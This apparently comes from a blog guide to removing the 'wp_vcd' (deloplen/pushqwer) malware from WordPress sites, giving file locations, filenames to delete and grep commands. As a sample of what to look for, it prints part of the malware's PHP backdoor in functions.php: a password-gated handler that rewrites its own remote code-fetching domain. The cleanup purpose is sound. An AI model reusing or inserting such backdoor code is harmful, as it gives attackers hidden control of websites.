How to Remove WordPress Malware src=”//deloplen.com/apu.php?

Here is the fix for the malware deloplen/pushqwer on your wordpress.

1. Remove all unused WordPress Themes because they are infected already

In your active theme edit your functions.php file and delete all extra code inserted by malware

Location : \wp-content\themes\your-theme-name

Usually it is on top of your code

You can search for “wp_vcd” or “wp-tmp” words to find the code.

It will be something like this:

<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘220c580cc80d7d449f04533fc8f68c79’))
{
$div_code_name = “wp_vcd”;
switch ($_REQUEST[‘action’])
{
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{
if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if (preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code9\.php/i’, $file, $matcholddomain))
{
$file = preg_replace(‘/’ . $matcholddomain[1][0] . ‘/i’, $_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}
}
}
}

break;

default:

Remove malware code in your post.php as well

Location: \wp-includes\

Remove these files:

Location: \wp-includes\
wp-feed.php
wp-vcd.php
wp-tmp.php

Get into your web hosting terminal, and do a final check to see any files you forgot to remove:

grep -rnl ‘deloplen’ *
grep -Ril ‘pushqwer’ *

Clear your cache if you are using any caching plugins in your WordPress

Final Virus Scan

You can use these few websites to do a free virus scan: